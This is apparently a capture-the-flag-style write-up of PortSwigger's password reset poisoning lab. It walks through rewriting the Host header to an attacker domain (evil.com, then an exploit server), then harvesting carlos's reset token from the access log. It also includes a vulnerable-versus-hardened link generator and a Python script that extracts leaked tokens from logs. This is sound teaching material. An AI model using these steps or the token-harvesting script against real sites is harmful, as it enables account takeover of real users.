PortSwigger: Basic Password Reset Poisoning Writeup
In this article we discuss an account takeover technique that abuses the HTTP Host header to perform password reset poisoning.
What is Password Reset Poisoning?
Password reset poisoning is a technique in which the attacker manipulates the Host header of the password reset request so that the vulnerable website builds the reset link with a domain name the attacker controls. Any victim who clicks that link sends their reset token to the attacker's server instead of the real site.
How Does Password Reset Normally Work?
These are the steps when a user has forgotten their password and wants to reset it:
- The user goes to the website's password reset page, which prompts for a username or email address.
- The backend checks whether that username/email exists. If it does, it generates a unique reset token that is only valid for a limited time and appends it to a password reset link. The final URL looks something like this:
https://example-website.com/reset?token=HSsamQDHCrOyzpkjgL
- The website asks the user to check their email inbox and click the password reset link.
- The user clicks the link and is shown a form asking for the new password.
- After the user submits the new password, the account password is changed to it.
How Do Attackers Abuse the HTTP Host Header to Steal the Reset Token?
Some vulnerable websites take the domain name for the reset link from the HTTP Host header of the incoming request rather than from server-side configuration.
This is an example of an attacker manipulating the HTTP Host header, replacing the original domain name with a domain the attacker controls, evil-user.net.
In the backend the password reset link is generated with the domain name taken from the Host header, so the email sent to the victim looks something like this:
As you can see, the domain name in the email the victim received has changed to the attacker-controlled domain. If the victim clicks the reset link, the request goes to the attacker's server, and the attacker can read the victim's reset token from that server's access log.
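To make the backend side of this concrete, here is an added example (not code from the lab or from the original article) of a reset-link generator that trusts the Host header next to a hardened version that builds the link from a configured origin and rejects unexpected Host values. The request dict shape, CANONICAL_ORIGIN and ALLOWED_HOSTS are assumptions for illustration; evil-user.net and example-website.com are the domains used in the text.

```python
"""Password reset link generation: Host-header-derived (vulnerable) vs. configured origin.

Added example; not code from the lab or the original article. The request dict
shape, CANONICAL_ORIGIN and ALLOWED_HOSTS are assumptions for illustration.
"""
import secrets
from urllib.parse import urlencode, urlparse

# Hardened configuration: the site's public origin is fixed server-side and never
# read from the request. (Values are assumptions; the text names example-website.com.)
CANONICAL_ORIGIN = "https://example-website.com"
ALLOWED_HOSTS = {"example-website.com"}

# Constructed sample requests as the backend sees them after parsing. The first is a
# normal reset request; the second has its Host header rewritten by the attacker
# (evil-user.net is the attacker domain used in the text above).
LEGIT_REQUEST = {
    "path": "/forgot-password",
    "headers": {"Host": "example-website.com"},
    "form": {"username": "wiener"},
}
POISONED_REQUEST = {
    "path": "/forgot-password",
    "headers": {"Host": "evil-user.net"},
    "form": {"username": "carlos"},
}


def new_reset_token() -> str:
    """A random, URL-safe token; a real implementation also stores it with an expiry."""
    return secrets.token_urlsafe(18)


def vulnerable_reset_link(request: dict, token: str) -> str:
    """Deliberately vulnerable: builds the link from the client-supplied Host header,
    so whoever controls that header controls where the victim sends the token."""
    host = request["headers"]["Host"]
    return f"https://{host}/reset?{urlencode({'token': token})}"


def hardened_reset_link(request: dict, token: str) -> str:
    """Hardened: the link is built from the configured origin only, and a Host header
    that does not match an allowlisted hostname aborts the request outright."""
    host = request["headers"].get("Host", "").split(":", 1)[0].lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"{CANONICAL_ORIGIN}/reset?{urlencode({'token': token})}"


def link_host(link: str) -> str:
    """Hostname the reset link would send the victim (and the token) to."""
    return urlparse(link).hostname


def accepts_request(builder, request: dict) -> bool:
    """True if `builder` would produce a link for `request` at all."""
    try:
        builder(request, "probe")
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    token = new_reset_token()
    for name, request in ("legit", LEGIT_REQUEST), ("poisoned", POISONED_REQUEST):
        link = vulnerable_reset_link(request, token)
        print(f"vulnerable, {name}: token goes to {link_host(link)}")
        if accepts_request(hardened_reset_link, request):
            print(f"hardened,   {name}: {hardened_reset_link(request, token)}")
        else:
            print(f"hardened,   {name}: rejected Host {request['headers']['Host']!r}")
```

The important design point is that the hardened version never derives the origin from the request at all; the Host allowlist is a second line of defence that also catches other Host header attacks, and it strips any port before comparing so a legitimate `example-website.com:443` still passes.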
Now It's Time To Dive Into The Practical Part
In this part we try the basic password reset poisoning account takeover technique against PortSwigger's Web Security Academy lab.
Here's the scenario for us:
Based on the above scenario:
- We can use the wiener user to test the exploit, as we have access to wiener's email inbox and account on the vulnerable website.
- The lab asks us to take over the carlos user's account, as carlos will carelessly click any link sent to his email.
Finding The Vulnerability On The Testing Account
First, let's check the login page. There we find the 'Forgot Password' link; clicking it takes us to the password reset page.
The password reset page asks for a username or email address and submits it to start the reset. We will try the wiener user first.
Now we intercept the request with Burp Suite. The POST body carries the username wiener, and the HTTP Host header is the original website's domain name.
After forwarding the request, the page shows a message telling us to check our email for the password reset link.
Now let's check wiener's email. This is what the received email looks like: the generated link uses the original domain name, exactly as in the Host header, with the unique reset token appended.
Clicking the link takes us to a page where we can reset the password without entering the old credentials.
Now let's repeat the password reset process, but this time we change the HTTP Host header to the domain name evil.com and forward the request.
Checking wiener's email again, we notice that the domain name of the password reset link has changed to evil.com, the value we injected through the Host header. We can conclude that this website's password reset mechanism is vulnerable to an HTTP Host header attack (basic password reset poisoning).
Time To Take Over Carlos's Account!
Note (the carlos user will only click links whose hostname is the PortSwigger exploit server's):
I tried using ngrok port tunnelling to pass the reset token to my local PHP server. It worked for wiener's account: when I clicked the password reset link, my local PHP server captured the reset token.
But it doesn't work for the carlos user. He doesn't click my ngrok password reset link! So we stick with PortSwigger's exploit server.
Now let's take over carlos's account. First we note down the PortSwigger exploit server's hostname, since we will need to read the exploit server's access.log.
Now we edit the HTTP Host header of the /forgot-password request to our exploit server's hostname.
Here we change the username to carlos, since we now want to take over carlos's account, and forward the request.
Now, assuming carlos has just clicked the malicious password reset link, let's check our exploit server's access.log, and voila! We have captured the reset token for carlos's account.
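Reading the token out of the access log by eye works for one victim, but a real log also contains our own probes and unrelated requests. The following is an added example (not the lab's or the article's code) that extracts every reset token from log text and picks the latest one. The Apache-style combined log format, the /reset path and the token parameter name are assumptions taken from the example URL earlier in this article, not from the lab's real log or link format; the log lines are constructed sample data, and the token value is the one from that example URL.

```python
"""Pull the victim's leaked reset token out of the exploit server's access log.

Added example; not the lab's or the article's code. The Apache-style combined log
format and the /reset?token= link shape are assumptions (the article does not show the
exploit server's real log format); the token value is the one from the example URL above.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed sample access log. Only the last line is the victim following the
# poisoned link; the others are the kind of noise (our own probe, a favicon fetch,
# a visit with no token) a real log also contains.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.10 - - [01/Jan/2024:10:00:01 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /reset HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /reset?token=HSsamQDHCrOyzpkjgL HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# Client IP at the start of the line, then the quoted request line: "METHOD target HTTP/x.y"
LOG_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def reset_tokens(log_text: str, path: str = "/reset", param: str = "token") -> list:
    """Return (client_ip, token) for every logged request to `path` that carries `param`."""
    found = []
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if target.path != path:
            continue
        # parse_qs percent-decodes the values for us.
        for token in parse_qs(target.query).get(param, []):
            found.append((match.group("ip"), token))
    return found


def latest_token(log_text: str, **kwargs):
    """The most recently captured token, or None if nobody has clicked yet."""
    hits = reset_tokens(log_text, **kwargs)
    return hits[-1][1] if hits else None


def target_reset_url(target_host: str, token: str) -> str:
    """Rebuild the link on the real site; this is the URL to open to set the new password."""
    return f"https://{target_host}/reset?{urlencode({'token': token})}"


if __name__ == "__main__":
    token = latest_token(SAMPLE_ACCESS_LOG)
    print("captured token:", token)
    print("open:", target_reset_url("example-website.com", token))
```

Because tokens are time-limited, the captured value must be used promptly: `target_reset_url` puts it back onto the real site's hostname so it can be submitted before it expires. The `path` and `param` arguments exist so the parser can be pointed at whatever link shape the target actually emits.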
Using the temporary reset token, we can access the page that changes carlos's password.
Now let's change carlos's password.
After changing carlos's password, let's log in to carlos's account with the newly set credentials.
Voila! We have taken over carlos's account!